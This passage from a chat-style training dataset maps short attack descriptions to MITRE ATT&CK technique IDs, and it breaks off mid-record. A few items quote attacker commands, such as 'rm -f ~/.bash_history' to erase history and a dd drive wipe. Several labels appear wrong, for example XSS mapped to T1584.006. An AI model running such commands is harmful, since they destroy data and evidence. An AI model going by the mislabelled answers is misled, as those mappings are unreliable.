- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary exploits a compromised Microsoft Teams account to send a private message with a link to a malicious script hosted on a malicious web server."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Phishing: Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group exploited a misconfigured web server to serve a defacement page in place of the internal employee directory site."
- },
- {
- "role": "assistant",
- "content": "T1491.001 - Defacement: Internal Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary uses tar and gzip to bundle stolen files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious macro runs a command to overwrite each sector of the target's HDD with random data."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Wipe: Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A PowerShell command `([ADSI]'LDAP://RootDSE').defaultNamingContext` is used followed by a directory search to list groups."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A script uses the 'dd' utility to write zeros across the entire block device, effectively wiping the drive."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Wipe: Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actors place a crafted dynamic library in a location that is loaded before the legitimate library, causing the victim process to execute attacker code."
- },
- {
- "role": "assistant",
- "content": "T1574.004 - Hijack Execution Flow: Dylib Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker sends targeted emails with malicious links that direct victims to a fake login portal to steal their corporate credentials."
- },
- {
- "role": "assistant",
- "content": "T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious software exploits Outlook Web Access to download the victim's mailbox data via API calls."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actors compromise popular news sites and insert SEO‑friendly malicious redirects, so that search queries for current events lead to a malicious site delivering ransomware."
- },
- {
- "role": "assistant",
- "content": "T1608.006 - Stage Capabilities: SEO Poisoning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries abused Group Policy Objects to push a harmful script to all domain-joined computers."
- },
- {
- "role": "assistant",
- "content": "T1072 - Software Deployment Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By backdating the timestamps of dropped payloads, the attacker attempts to avoid detection by timeline correlating tools."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The RAT creates an Active Setup registry entry that points to a custom DLL, which is loaded automatically during user logon for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.014 - Boot or Logon Autostart Execution: Active Setup"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A defacement event occurred where the attacker changed the site’s title tag to read “Owned by XYZ”."
- },
- {
- "role": "assistant",
- "content": "T1491 - Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Defacement observed: attacker posted a large red banner across all pages with the phrase “We are #Anonymous”."
- },
- {
- "role": "assistant",
- "content": "T1491 - Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Using InstallUtil, the threat actor registers a malicious assembly, achieving code execution without direct binary execution."
- },
- {
- "role": "assistant",
- "content": "T1218.004 - System Binary Proxy Execution: InstallUtil"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious component is added to the list of loaded authentication packages, allowing execution with SYSTEM privileges on each logon."
- },
- {
- "role": "assistant",
- "content": "T1547.002 - Boot or Logon Autostart Execution: Authentication Package"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware hooks system calls to modify timestamps returned to the user space, effectively hiding its activity."
- },
- {
- "role": "assistant",
- "content": "T1565.003 - Data Manipulation: Runtime Data Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker leaves a voicemail claiming a suspicious activity on the target’s account and directs them to call a toll‑free number to resolve the issue, where credentials are harvested."
- },
- {
- "role": "assistant",
- "content": "T1566.004 - Phishing: Spearphishing Voice"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker executes \"docker info\" to gather host-level Docker daemon details and resource limits."
- },
- {
- "role": "assistant",
- "content": "T1613 - Container and Resource Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary initiates a remote desktop connection via port 3389 to gain interactive access to the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware exfiltrates system information by embedding it in ICMP echo request payloads."
- },
- {
- "role": "assistant",
- "content": "T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker scrambles data by converting it to hexadecimal representation before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1001 - Data Obfuscation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious macro executed a routine that calls the Exchange Web Services API to wipe recent email logs from user mailboxes."
- },
- {
- "role": "assistant",
- "content": "T1070.008 - Indicator Removal: Clear Mailbox Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attacker performs a cross‑site scripting (XSS) attack on a vulnerable web portal to execute malicious scripts in users’ browsers."
- },
- {
- "role": "assistant",
- "content": "T1584.006 - Compromise Infrastructure: Web Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers upload stolen files to a public code snippet service, disguising the data as legitimate source code to avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1567.003 - Exfiltration Over Web Service: Exfiltration to Text Storage Sites"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker drops a .vbs file on the victim machine and runs it using wscript.exe to download additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion utilizes a web service endpoint to silently stream logs to the commander's server, employing only outbound traffic."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - Web Service: One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A phishing payload installs a launch agent in the user's Library folder to maintain persistence across sessions."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker leverages LC_LOAD_DYLIB addition to hijack the binary’s loading process and run a malicious shared library."
- },
- {
- "role": "assistant",
- "content": "T1546.006 - Event Triggered Execution: LC_LOAD_DYLIB Addition"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker uses a malicious Dockerfile to build and run a container that installs a keylogger on the host."
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy Container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During the intrusion, the threat actor queries the OS for a list of active application windows to discover potential footholds."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious actor leverages the cloud provider's restore feature to revert a tampered container instance back to a clean state, removing evidence of their activity."
- },
- {
- "role": "assistant",
- "content": "T1578.004 - Modify Cloud Compute Infrastructure: Revert Cloud Instance"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A mobile malware leverages a vulnerability to exit the sandbox and launch a payload on the connected host machine."
- },
- {
- "role": "assistant",
- "content": "T1611 - Escape to Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor configures a Gmail filter that redirects all received messages to a personal email account for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1114.003 - Email Collection: Email Forwarding Rule"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A trojan injects code into active processes to intercept and store keyboard input from privileged applications."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Phishing email directed the user to a fake login portal that requested their MFA token, which was then relayed to the attacker in real time."
- },
- {
- "role": "assistant",
- "content": "T1111 - Multi-Factor Authentication Interception"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware encrypts stolen data then concatenates random filler bytes, producing a stream that appears benign and bypasses data‑loss‑prevention filters."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Data Obfuscation: Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker sends a deceptive email claiming a software update is required, prompting users to submit their login credentials and internal network layout."
- },
- {
- "role": "assistant",
- "content": "T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder disables the firewall by setting the policy to allow all traffic."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By hijacking the TFTP boot process, the threat actor injects malicious payloads during the pre‑OS phase."
- },
- {
- "role": "assistant",
- "content": "T1542.005 - Pre-OS Boot: TFTP Boot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious binary adjusts its command-line display to mimic a benign backup utility, preventing security tools from flagging the process as suspicious."
- },
- {
- "role": "assistant",
- "content": "T1564.010 - Hide Artifacts: Process Argument Spoofing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious code is compiled and signed with a self‑generated certificate that is not recognized by the OS, yet the file is placed where a signed driver is expected."
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Masquerading: Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post‑exploitation script deploys a fake root certificate on the victim's system, allowing the attacker to decrypt HTTPS traffic."
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A compromised email attachment contains an Outlook form that, when opened, registers itself to run automatically at Outlook startup."
- },
- {
- "role": "assistant",
- "content": "T1137.003 - Office Application Startup: Outlook Forms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Post-exploitation, the adversary issues the command \"rm -f ~/.bash_history\" to delete the command history log."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors use the Windows built‑in tool vssadmin to generate a shadow copy before dumping the NTDS database for password hashes."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers perform network sweeps with vulnerability scanners to identify unpatched services on target hosts."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Active Scanning: Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious code uses a custom AES‑encrypted channel over UDP for fast data transfer."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A rootkit on macOS reads the securityd process memory to harvest encrypted passwords."
- },
- {
- "role": "assistant",
- "content": "T1555.002 - Credentials from Password Stores: Securityd Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actor abuses the AWS API Gateway to invoke a Lambda that runs a malicious shell command."
- },
- {
- "role": "assistant",
- "content": "T1059.009 - Command and Scripting Interpreter: Cloud API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor employs a custom crawler to index all pages on a victim's domain, looking for exposed API endpoints and configuration files."
- },
- {
- "role": "assistant",
- "content": "T1594 - Search Victim-Owned Websites"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The exploit retrieves credential blobs by dumping securityd's memory and decoding the stored entries."
- },
- {
- "role": "assistant",
- "content": "T1555.002 - Credentials from Password Stores: Securityd Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious script queries SMB shares by executing `Get-SmbShare` in PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker leverages compromised AWS EC2 instances to run illicit crypto miners, draining the victim's cloud credits."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary modifies the Logon Scripts (Group Policy) to point to a malicious .cmd file on a network share."
- },
- {
- "role": "assistant",
- "content": "T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder leveraged stolen credentials to initiate a Remote Desktop Protocol (RDP) session and remotely control the victim's workstation."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious code checks for the presence of sandbox monitoring tools by searching for processes named \"vboxservice.exe\" or \"qemu-ga\"."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker uses a kernel‑mode driver to perform Direct Kernel Object Manipulation (DKOM) and inject code into a user‑mode process's address space."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker reused an expired but still valid session cookie retrieved from a previous breach to gain access to a protected web resource."
- },
- {
- "role": "assistant",
- "content": "T1550.004 - Use Alternate Authentication Material: Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers inject code into a legitimate process and use shared memory sections to communicate with their payload."
- },
- {
- "role": "assistant",
- "content": "T1559 - Inter-Process Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malicious document contains an 
-
-